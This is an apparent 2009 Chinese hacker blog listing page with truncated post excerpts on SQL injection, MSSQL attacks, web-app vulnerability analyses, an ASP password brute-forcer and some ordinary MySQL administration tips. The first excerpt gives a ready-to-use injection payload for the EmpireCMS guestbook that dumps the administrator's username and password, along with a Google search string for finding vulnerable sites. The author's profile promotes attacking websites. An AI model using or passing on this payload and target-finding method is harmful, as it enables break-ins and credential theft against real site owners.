2009-07-13 09:41
2009-07-13 09:40
2009-07-13 09:40
找到使用帝国CMS的站,网址后面直接加:e/tool/gbook/?bid=1
出来的是帝国CMS的留言本,在姓名处写:縗\
联系邮箱处写:,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from
phome_enewsuser where userid=1),1,1,1,0,0,0)/*
提交后爆出账号密码
测试方法:利用google搜索关键字 inurl:e/tool/gbook/?bid=1,然后依照 |
2009-06-29 06:15
2009-06-29 06:13
Author:零魂(zerosoul)
Blog: http://hi.baidu.com/0soul
转载请带上版权。
这是这次出攻防大赛题目的时候顺便做的一些注入总结,是我通过查询系统表结构总结出来的。只要注入点有效,并且没有过滤单引号,即使它管理员表名和字段名设置的再复杂都是可以猜出来的,而且由于是用union,效率还是很高的。还有只需要DBO权限即可。
以一个数字型注入点为例( 暂时假设这个数字型注入点对单 |
2009-06-29 06:13
lcx和剑心等大牛在06年的时候就已经在用这种语法了,而我等小辈到最近才领略到,惭愧惭愧......
手头暂时没有注入点测试,就先以我机器上的MSSQL做实验吧。
下面的语句我直接写完整的SQL语句,注入的时候稍微改改就能用了,呵呵。
假如现在有个注入点,所查询表的结构如下图:
|
2009-06-25 16:53
我记得有一种黑客工具,在得到对方SQL SERVER服务器的SA帐号和密码后竟可以通过它上传文件到对方
服务器上面,并远程执行DOS命令。当时觉得很好奇,当然作为程序员的我觉得很不爽,
赶快对SQL SERVER进行了一番研究,并整理出了这篇文章,希望对一些程序新手会有帮助。
写过数据库程序的朋友应该知道,我们可以往数据库中存取各种类型的资 |
2009-06-19 04:19
方法一
使用phpmyadmin,这是最简单的了,修改mysql库的user表,不过别忘了使用PASSWORD函数。
方法二
使用mysqladmin,这是前面声明的一个特例。
mysqladmin -u root -p password mypasswd
输入这个命令后,需要输入root的原密码,然后root的密码将改为mypasswd。
把命令里的root改为你的用户名,你就可以改你自己的密码了。
当然如果你的mysqladmin连接不上mysql server,或者你没有办法执行mysqladmin,那么这种方法就是无效的,而且mysqladmin无法把密码 |
2009-06-19 04:18
如果忘记了 MySQL 的 root 密码,可以用以下方法重新设置:
1. KILL掉系统里的MySQL进程,方法如下:
a、点击桌面工具栏打开任务栏管理器。
b、从任务管理器的进程中找到mysqld-nt.exe进程,点击右键选择结束进程。
2. 在命令行中输入命令 mysqld-nt --skip-grant-tables 启动MySQL,以不检查权限的方式启动;
3. 然后另外开一窗口,用空密码方式使用root用户登录 MySQL;
4. 修改root用户的密码;
mysql> update mysql.user set password=PASSWORD('新密码') where U |
2009-06-19 04:02
CREATE PROCEDURE dbo.dataToSQLScript
@tablename sysname
AS
declare @column varchar(1000)
declare @columndata varchar(1000)
declare @sql varchar(4000)
declare @xtype tinyint
declare @name sysname
declare @objectId int
declare @objectname sysname
declare @ident int
set nocount on
set @objectId=object_id(@tablename)
if @objectId is null -- 判断对象是否存在
begin
print 'The object not ex
|
2009-06-19 04:02
--数据库结构导出语句
SELECT
表名=CASE WHEN C.column_id=1 THEN O.name ELSE N'' END,
TableDesc=ISNULL(CASE WHEN C.column_id=1 THEN PTB.[value] END,N''),
Column_id=C.column_id,
ColumnName=C.name,
PrimaryKey=ISNULL(IDX.PrimaryKey,N''),
[IDENTITY]=CASE WHEN C.is_identity=1 THEN N'√'ELSE N'' EN
|
2009-06-16 21:24
幻泉[B.S.N] 黑客防线
漏洞等级:中等
漏洞说明:
漏洞出现在js.asp中,我们首先看源代码。
Code:
If CheckStr(Request("ClassNo")) <> "" then
ClassNo = split(CheckStr(Request("ClassNo")),"|")
'这里是获取变量利用checkstr过滤,但是感觉好像没起作用。然后分成数组
on error resume next
NClassID = LaoYRequest(ClassNo(0))
NClassID1 = LaoYRequest(ClassNo(1))
'获取数组1,与数组2进行整 |
2009-06-16 21:23
今天看东西看累了,就随便下载了这样的一套代码。
大家可以看下他的说明,号称完全防注入攻击,密码32位Md5加密。
看了一下大部分注射是基本不可能了,除非对方漏写东西。
但是有这样一个比较可说的漏洞。
cf_do.php
Code:
//留言
if($action=="gbookaddsave")
{
$username=chkstr($_GET["username"],1);
$content=HTMLSpecialChars(chkstr($_POST["content"],1));
$contact=HTMLSpecialChars(chkstr($_POST["contact |
2009-06-15 06:15
作者: Knight
一个暴力破解MSSQL用户密码的ASP程序,以下这个版本是可以运行之后关闭浏览器,运行
完毕将在当前目录生成结果文件的。
CODE:
|
2009-06-15 06:12
我查资料时找来的,发现还挺全的,就转来了。
1、上面的文本框只能输入数字代码(小数点也不能输入):
CODE:
<input onkeyup="this.value=this.value.replace(/\D/g,'')" onafterpaste="this.value=this.value.replace(/\D/g,'')">
<input onkeyup="this.value=this.value.replace(/\D/g,'')" onafterpaste="this.value=this.value.replace(/\D/g,'')">
2、只能输入数字,能输小数点.(注 |
|
|
网名:天使之翼
联系QQ:1581901
E-Mali:hack078@163.com
人生格言:
技术无止境,挑站赢世界!
|
a
|
加为好友
送他礼物
发送消息
